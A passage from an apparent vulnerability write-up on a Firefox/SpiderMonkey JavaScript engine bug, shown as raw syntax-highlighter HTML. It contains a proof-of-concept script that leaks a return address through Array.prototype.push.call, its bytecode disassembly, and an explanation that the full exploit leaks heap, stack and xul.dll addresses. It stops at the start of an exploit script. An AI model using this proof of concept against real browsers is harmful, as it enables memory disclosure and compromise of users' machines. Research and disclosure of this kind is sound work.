data-line=\"crayon-5bbd2958b1242943729547-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1242943729547-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1242943729547-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1242943729547-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1242943729547-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1242943729547-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1242943729547-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1242943729547-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1242943729547-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1242943729547-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1242943729547-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1242943729547-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1242943729547-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1242943729547-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1242943729547-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1242943729547-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1242943729547-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1242943729547-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1242943729547-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1242943729547-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1242943729547-23\">23<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1242943729547-1\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">test<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1242943729547-2\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13.37<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1242943729547-3\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1242943729547-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1242943729547-5\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">f<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1242943729547-6\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1242943729547-7\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1242943729547-8\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">useless<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1242943729547-9\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">useless<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">useless<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1242943729547-10\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sz<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">prototype<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">push<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">call<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1337<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">43<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1242943729547-11\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1242943729547-12\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-i\">sz<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1242943729547-13\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1242943729547-14\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1242943729547-15\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">test<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1242943729547-16\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1242943729547-17\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1242943729547-18\"><span class=\"crayon-e\">dis<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1242943729547-19\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">25000<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1242943729547-20\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">f<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1242943729547-21\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1242943729547-22\"><span class=\"crayon-e\">f<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">100<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1242943729547-23\"><span class=\"crayon-r\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">test<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0047 seconds] -->  <\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bbd2958b1246971083666\" class=\"crayon-syntax crayon-theme-secrets-of-rock crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \/* bytecode:  &#8230;  00034: lambda function() {} # FUN  00039: setlocal 1 # FUN  00043: pop #  00044: getlocal 1 # useless  00048: getlocal 1 # useless useless  00052: add # (useless + useless)  00053: pop #  00054: getgname &#8220;Array&#8221; # Array  00059: getprop &#8220;prototype&#8221; # Array.prototype  00064: getprop &#8220;push&#8221; # Array.prototype.push  00069: dup # Array.prototype.push Array.prototype.push  00070: callprop &#8220;call&#8221; # Array.prototype.push Array.prototype.push.call  00075: swap # Array.prototype.push.call Array.prototype.push  00076: getlocal 0 # Array.prototype.push.call Array.prototype.push a  00080: uint16 1337 # Array.prototype.push.call Array.prototype.push a 1337  00083: int8 43 # Array.prototype.push.call Array.prototype.push a 1337 43  00085: funcall 3 # Array.prototype.push.call(&#8230;)  &#8230;  00104: newobject ({a:(void 0)}) # OBJ  00109: getgname &#8220;test&#8221; # OBJ test  00114: initprop &#8220;a&#8221; # OBJ  00119: setarg 0 # OBJ  00122: pop #  00123: retrval #<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1246971083666-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1246971083666-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1246971083666-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1246971083666-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1246971083666-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1246971083666-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1246971083666-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1246971083666-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1246971083666-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1246971083666-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1246971083666-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1246971083666-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1246971083666-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1246971083666-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1246971083666-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1246971083666-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1246971083666-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1246971083666-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1246971083666-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1246971083666-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1246971083666-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1246971083666-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1246971083666-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1246971083666-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b1246971083666-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b1246971083666-26\">26<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1246971083666-1\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bytecode<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1246971083666-2\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1246971083666-3\"><span class=\"crayon-cn\">00034<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">lambda <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># FUN<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1246971083666-4\"><span class=\"crayon-cn\">00039<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">setlocal<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># FUN<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1246971083666-5\"><span class=\"crayon-cn\">00043<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pop<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1246971083666-6\"><span class=\"crayon-cn\">00044<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">getlocal<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># useless<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1246971083666-7\"><span class=\"crayon-cn\">00048<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">getlocal<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># useless useless<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1246971083666-8\"><span class=\"crayon-cn\">00052<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">add<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># (useless + useless)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1246971083666-9\"><span class=\"crayon-cn\">00053<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pop<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1246971083666-10\"><span class=\"crayon-cn\">00054<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">getgname<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Array&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># Array<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1246971083666-11\"><span class=\"crayon-cn\">00059<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">getprop<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;prototype&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># Array.prototype<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1246971083666-12\"><span class=\"crayon-cn\">00064<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">getprop<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;push&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># Array.prototype.push<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1246971083666-13\"><span class=\"crayon-cn\">00069<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dup<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># Array.prototype.push Array.prototype.push<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1246971083666-14\"><span class=\"crayon-cn\">00070<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">callprop<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;call&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># Array.prototype.push Array.prototype.push.call<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1246971083666-15\"><span class=\"crayon-cn\">00075<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">swap<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># Array.prototype.push.call Array.prototype.push<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1246971083666-16\"><span class=\"crayon-cn\">00076<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">getlocal<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># Array.prototype.push.call Array.prototype.push a<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1246971083666-17\"><span class=\"crayon-cn\">00080<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">uint16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1337<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># Array.prototype.push.call Array.prototype.push a 1337<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1246971083666-18\"><span class=\"crayon-cn\">00083<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">int8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">43<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># Array.prototype.push.call Array.prototype.push a 1337 43<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1246971083666-19\"><span class=\"crayon-cn\">00085<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">funcall<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># Array.prototype.push.call(&#8230;)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1246971083666-20\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1246971083666-21\"><span class=\"crayon-cn\">00104<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">newobject<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># OBJ<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1246971083666-22\"><span class=\"crayon-cn\">00109<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">getgname<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;test&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># OBJ test<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1246971083666-23\"><span class=\"crayon-cn\">00114<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">initprop<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;a&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># OBJ<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1246971083666-24\"><span class=\"crayon-cn\">00119<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">setarg<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># OBJ<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b1246971083666-25\"><span class=\"crayon-cn\">00122<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pop<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b1246971083666-26\"><span class=\"crayon-cn\">00123<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">retrval<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0047 seconds] -->  <\/p>\n<p>Instruction 48 is there only to place a function on the stack so that the funcall instruction 85 does not throw an exception because it expects to fetch Array.prototype.push.call from the stack, but is off by 8. This prints 2.11951350117067e-310 on our system, which is the double representation of the integer value 0x27044d565235, which is a return address. The final exploit leverages this to leak a heap address, stack address as well as the base address of xul.dll.<\/p>\n<p><strong>Exploit<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bbd2958b124c514799649\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">JavaScript<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;script&gt;    var convert = new ArrayBuffer(0x100);  var u32 = new Uint32Array(convert);  var f64 = new Float64Array(convert);    var BASE = 0x100000000;    function i2f(x) {      